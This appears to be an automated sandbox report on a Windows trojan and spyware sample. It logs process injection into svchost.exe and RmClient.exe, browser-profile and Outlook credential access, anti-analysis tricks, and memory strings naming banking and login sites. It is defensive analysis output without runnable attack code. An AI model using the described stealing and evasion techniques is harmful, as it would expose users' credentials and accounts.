                Source: 9MZZG92yMO.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@15/9
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_0052A06A GetLastError,FormatMessageW,0_2_0052A06A
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_005181CB AdjustTokenPrivileges,CloseHandle,0_2_005181CB
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_005187E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_005187E1
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_0052B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0052B333
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_0053EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0053EE0D
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_0052C397 CoInitialize,CoCreateInstance,CoUninitialize,0_2_0052C397
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_004C4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_004C4E89
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeFile created: C:\Users\user\AppData\Local\Temp\aut28E3.tmpJump to behavior
                Source: 9MZZG92yMO.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: RmClient.exe, 00000006.00000003.2794979174.0000000002826000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000006.00000003.2793286140.00000000027F3000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000006.00000002.4010464904.0000000002826000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000006.00000003.2794979174.00000000027F3000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000006.00000002.4010464904.00000000027F3000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000006.00000003.2793206258.0000000002805000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: 9MZZG92yMO.exeVirustotal: Detection: 54%
                Source: 9MZZG92yMO.exeReversingLabs: Detection: 65%
                Source: unknownProcess created: C:\Users\user\Desktop\9MZZG92yMO.exe "C:\Users\user\Desktop\9MZZG92yMO.exe"
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\9MZZG92yMO.exe"
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exeProcess created: C:\Windows\SysWOW64\RmClient.exe "C:\Windows\SysWOW64\RmClient.exe"
                Source: C:\Windows\SysWOW64\RmClient.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\9MZZG92yMO.exe"Jump to behavior
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exeProcess created: C:\Windows\SysWOW64\RmClient.exe "C:\Windows\SysWOW64\RmClient.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\RmClient.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\RmClient.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\RmClient.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: 9MZZG92yMO.exeStatic file information: File size 1210880 > 1048576
                Source: 9MZZG92yMO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: 9MZZG92yMO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: 9MZZG92yMO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: 9MZZG92yMO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: 9MZZG92yMO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: 9MZZG92yMO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: 9MZZG92yMO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: RmClient.pdbGCTL source: svchost.exe, 00000002.00000002.2453504721.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2453522622.0000000003212000.00000004.00000020.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000005.00000002.4010832786.0000000000768000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: XBOIFKGKIWT.exe, 00000005.00000002.4011137897.0000000000EFE000.00000002.00000001.01000000.00000005.sdmp, XBOIFKGKIWT.exe, 00000008.00000000.2522823189.0000000000EFE000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: 9MZZG92yMO.exe, 00000000.00000003.2175316459.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, 9MZZG92yMO.exe, 00000000.00000003.2173408119.00000000038E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358220983.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2454227225.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2454227225.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356378337.0000000003400000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000006.00000002.4011500190.0000000002E2E000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000006.00000003.2452824167.0000000002936000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000006.00000003.2457466949.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000006.00000002.4011500190.0000000002C90000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: 9MZZG92yMO.exe, 00000000.00000003.2175316459.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, 9MZZG92yMO.exe, 00000000.00000003.2173408119.00000000038E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2358220983.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2454227225.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2454227225.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356378337.0000000003400000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, RmClient.exe, 00000006.00000002.4011500190.0000000002E2E000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000006.00000003.2452824167.0000000002936000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000006.00000003.2457466949.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000006.00000002.4011500190.0000000002C90000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: RmClient.exe, 00000006.00000002.4012231174.00000000032BC000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4010464904.000000000276D000.00000004.00000020.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000000.2523020110.00000000027FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2902094064.000000003A76C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: RmClient.exe, 00000006.00000002.4012231174.00000000032BC000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4010464904.000000000276D000.00000004.00000020.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000000.2523020110.00000000027FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2902094064.000000003A76C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: RmClient.pdb source: svchost.exe, 00000002.00000002.2453504721.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2453522622.0000000003212000.00000004.00000020.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000005.00000002.4010832786.0000000000768000.00000004.00000020.00020000.00000000.sdmp
                Source: 9MZZG92yMO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: 9MZZG92yMO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: 9MZZG92yMO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: 9MZZG92yMO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: 9MZZG92yMO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_004C4B37 LoadLibraryA,GetProcAddress,0_2_004C4B37
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_004CC4C6 push A3004CBAh; retn 004Ch0_2_004CC50D
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_004E8945 push ecx; ret 0_2_004E8958
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004020A2 push esp; iretd 2_2_004020A3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040A9ED push esi; iretd 2_2_0040A9EE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004031B0 push eax; ret 2_2_004031B2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041EB30 push ebx; retf 2_2_0041EB5F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416BEE push ebp; ret 2_2_00416BF1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417D70 push esi; ret 2_2_00417D71
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004135D8 pushad ; retf 2_2_00413646
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00413697 pushad ; retf 2_2_00413646
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004136A8 pushad ; retf 2_2_00413646
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380225F pushad ; ret 2_2_038027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038027FA pushad ; ret 2_2_038027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038309AD push ecx; mov dword ptr [esp], ecx2_2_038309B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380283D push eax; iretd 2_2_03802858
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03801368 push eax; iretd 2_2_03801369
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02CC09AD push ecx; mov dword ptr [esp], ecx6_2_02CC09B6
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_001C2003 push ebx; ret 6_2_001C2048
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_001D020F push eax; iretd 6_2_001D021C
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_001C0425 pushad ; retf 6_2_001C0493
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_001C04F5 pushad ; retf 6_2_001C0493
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_001C04E4 pushad ; retf 6_2_001C0493
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_001C4BBD push esi; ret 6_2_001C4BBE
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_001BD070 push esi; ret 6_2_001BD07B
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_001B783A push esi; iretd 6_2_001B783B
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_001CB97D push ebx; retf 6_2_001CB9AC
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_001C3A3B push ebp; ret 6_2_001C3A3E
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_001D3C10 push edx; retf 6_2_001D3B6B
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_001CBC34 push ds; ret 6_2_001CBC36
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_001CFF68 push FFFFFFD3h; retf 6_2_001CFF6A
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02A351B5 push edx; iretd 6_2_02A351C5
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_004C48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004C48D7
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_00545376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00545376
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_004E3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004E3187
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\RmClient.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\RmClient.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\RmClient.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\RmClient.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\RmClient.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeAPI/Special instruction interceptor: Address: 11090A4
                Source: C:\Windows\SysWOW64\RmClient.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
                Source: C:\Windows\SysWOW64\RmClient.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
                Source: C:\Windows\SysWOW64\RmClient.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
                Source: C:\Windows\SysWOW64\RmClient.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
                Source: C:\Windows\SysWOW64\RmClient.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
                Source: C:\Windows\SysWOW64\RmClient.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
                Source: C:\Windows\SysWOW64\RmClient.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
                Source: C:\Windows\SysWOW64\RmClient.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0387096E rdtsc 2_2_0387096E
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-101925
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeAPI coverage: 4.6 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\RmClient.exeAPI coverage: 2.6 %
                Source: C:\Windows\SysWOW64\RmClient.exe TID: 2052Thread sleep count: 44 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\RmClient.exe TID: 2052Thread sleep time: -88000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe TID: 4176Thread sleep time: -75000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\RmClient.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\RmClient.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_0052445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0052445A
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_0052C6D1 FindFirstFileW,FindClose,0_2_0052C6D1
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_0052C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0052C75C
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_0052EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0052EF95
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_0052F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0052F0F2
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_0052F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0052F3F3
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_005237EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_005237EF
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_00523B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00523B12
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_0052BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0052BCBC
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_001CC0D0 FindFirstFileW,FindNextFileW,FindClose,6_2_001CC0D0
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_004C49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_004C49A0
                Source: 40182GJpK.6.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: XBOIFKGKIWT.exe, 00000008.00000002.4010904337.00000000007AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllX
                Source: 40182GJpK.6.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: 40182GJpK.6.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: RmClient.exe, 00000006.00000002.4015364519.00000000077C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sswords blocklistVMware20,11696487552
                Source: 40182GJpK.6.drBinary or memory string: discord.comVMware20,11696487552f
                Source: 40182GJpK.6.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                Source: RmClient.exe, 00000006.00000002.4015364519.00000000077C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware20,1169648
                Source: RmClient.exe, 00000006.00000002.4015364519.00000000077C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,116d
                Source: 40182GJpK.6.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: 40182GJpK.6.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: RmClient.exe, 00000006.00000002.4015364519.00000000077C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ansaction PasswordVMware20,11696487552
                Source: RmClient.exe, 00000006.00000002.4015364519.00000000077C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,1169648M
                Source: RmClient.exe, 00000006.00000002.4015364519.00000000077C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,1169648755
                Source: RmClient.exe, 00000006.00000002.4015364519.00000000077C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware20,11696487552n
                Source: 40182GJpK.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: 40182GJpK.6.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: 40182GJpK.6.drBinary or memory string: global block list test formVMware20,11696487552
                Source: 40182GJpK.6.drBinary or memory string: tasks.office.comVMware20,11696487552o
                Source: RmClient.exe, 00000006.00000002.4015364519.00000000077C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: omVMware20,11696
                Source: 40182GJpK.6.drBinary or memory string: AMC password management pageVMware20,11696487552
                Source: firefox.exe, 0000000A.00000002.2903779149.00000254FA69C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 40182GJpK.6.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: 40182GJpK.6.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                Source: 40182GJpK.6.drBinary or memory string: dev.azure.comVMware20,11696487552j
                Source: 40182GJpK.6.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: 40182GJpK.6.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: RmClient.exe, 00000006.00000002.4015364519.00000000077C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ve Brokers - HKVMware20,11696487552]
                Source: 40182GJpK.6.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: 40182GJpK.6.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: 40182GJpK.6.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: 40182GJpK.6.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: 40182GJpK.6.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                Source: 40182GJpK.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: RmClient.exe, 00000006.00000002.4015364519.00000000077C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ist test formVMware20,1169648755
                Source: 40182GJpK.6.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: 40182GJpK.6.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
